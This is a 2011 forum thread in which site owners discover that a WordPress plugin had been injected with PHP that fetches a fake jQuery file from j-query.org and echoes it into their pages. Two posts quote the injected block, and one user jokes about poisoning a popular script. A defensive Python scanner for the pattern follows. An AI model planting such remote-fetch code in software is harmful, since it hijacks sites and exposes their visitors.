
j-query hacked?

Discussion in 'BlackHat Lounge' started by fellllla, Nov 1, 2011.

  1. fellllla

    fellllla Newbie

    Can anyone explain to me why this

    http://www.j-query.org/jquery-1.6.4.min.js


    Contains a CPA offer?

    This JS is being populated in one of my sites.
     
  2. chipmunk951

    chipmunk951 Senior Member

    Hahaha,

    CPA Infinity

    GG
     
  3. ibins

    ibins Junior Member

    jquery.com is official
     
  4. chipmunk951

    chipmunk951 Senior Member

  5. jazzc

    jazzc Moderator Staff Member Moderator Jr. VIP

    That is so funny :D

    You've been owned ;)
     
  6. zero-day

    zero-day Regular Member

    The user above has been banned until he can further explain himself.
     
  7. Xyz01

    Xyz01 Regular Member Premium Member

    Because it's not the official jquery host?

    ALWAYS, ALWAYS use jquery.org or the Google CDN.. or better yet host it yourself.
     
  8. m0nster

    m0nster Senior Member

    edit: read below
     
  9. m0nster

    m0nster Senior Member


    Yes, you're correct. I'm he did some type of injection/hacking in order to replace the link you had referencing the proper jquery file.

    This is not a reflection of CPA infinity as I'm sure you understand now.

    User was banned; sorry this happened to your site. I'm not a security expert, but installing a security plugin, if your site is WordPress based, might help this guy and others from doing the same thing with an offer from another network.
     
  10. scraper1

    scraper1 Regular Member

    Remember kids: Stay in school, and most importantly, obfuscate your malicious JavaScript code.
     
  11. zero-day

    zero-day Regular Member

    Stay in school, and don't get schooled ;)
     
  12. zendobi

    zendobi Newbie

    Well I just noticed it on my site too. Both a link to j-query.org, and another timed redirect right in the very top of the header in all of my php pages. Not that hard to get rid of but still retarded :)
     
  13. artizhay

    artizhay BANNED BANNED

    Lol well that's what you get for going through a non-official site. Makes me want to make my own script, get thousands of people to rely on it, and then change it to a CPA offer. It's ingenious really.
     
  14. zendobi

    zendobi Newbie

    Report it to MediaTemple, that's where they are hosted.
     
  15. zendobi

    zendobi Newbie

    We aren't going thru a non-official site, they are finding a way into WordPress and adding a short but sweet line of code to a plugin.

    PHP:
    <?php
    if(function_exists('curl_init'))
    {
        $url = "hxxp://"URL"/jquery-1.6.3.min.js"
        $ch = curl_init();
        $timeout = 5;
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
        $data = curl_exec($ch);
        curl_close($ch);
        echo "$data";
    }
    ?>
    I do have to admit, that while rather simple it is also kinda smart.
     
  16. martbost

    martbost Registered Member

    Found the malicious code in WPZon and removed it from the "amazon.php" file for the plugin. It is at the very bottom of the file and the following should be removed completely.

    <?php
    if(function_exists('curl_init'))
    {
    $url = "http://www.j-query.org/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
    }
    ?>

    Sneaky little Bastard!!!
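
A defensive check for the injection found in this thread, added here as an example (it is not code from any poster or from the WPZon plugin): it flags PHP source that hard-codes a `.js` URL on a host outside an allowlist, or that echoes a `curl_exec()` response into the page. The allowlist contents, the function names `scan_php` and `scan_tree`, and the rule names are assumptions; both rules are heuristics over source text, not a PHP parser.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the only hosts this site intentionally loads jQuery from.
ALLOWED_HOSTS = {"code.jquery.com", "ajax.googleapis.com"}
URL_RE = re.compile(r"""["'](https?://[^"'\s]+?\.js)["']""", re.I)
CURL_ASSIGN_RE = re.compile(r"(\$\w+)\s*=\s*curl_exec\s*\(")

def scan_php(source):
    """Return (line, rule, detail) findings for one PHP source string."""
    findings = []
    # Rule 1: a hard-coded .js URL whose host is not on the allowlist.
    for lineno, line in enumerate(source.splitlines(), 1):
        for url in URL_RE.findall(line):
            host = (urlparse(url).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                findings.append((lineno, "remote-js-host", host))
    # Rule 2: a curl_exec() result that is later echoed into the page.
    for m in CURL_ASSIGN_RE.finditer(source):
        var = re.escape(m.group(1))
        if re.search(r"\b(?:echo|print)\b[^;]*" + var + r"\b", source[m.end():]):
            lineno = source.count("\n", 0, m.start()) + 1
            findings.append((lineno, "curl-response-echoed", m.group(1)))
    return findings

def scan_tree(root):
    """Scan every .php file under root (for example wp-content/plugins)."""
    return {str(p): f for p in Path(root).rglob("*.php")
            if (f := scan_php(p.read_text(errors="replace")))}

# Constructed sample: the block quoted in the thread, as one PHP source string.
INJECTED = """<?php
if(function_exists('curl_init'))
{
$url = "http://www.j-query.org/jquery-1.6.3.min.js";
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo "$data";
}
?>"""
# Constructed benign sample that loads jQuery from an allowlisted CDN.
BENIGN = """<?php wp_enqueue_script('jquery',
    'https://ajax.googleapis.com/ajax/libs/jquery/1.6.4/jquery.min.js'); ?>"""
```

`scan_tree` returns only the files with findings, keyed by path, so it can be run over a plugin directory and compared against a clean copy of each plugin.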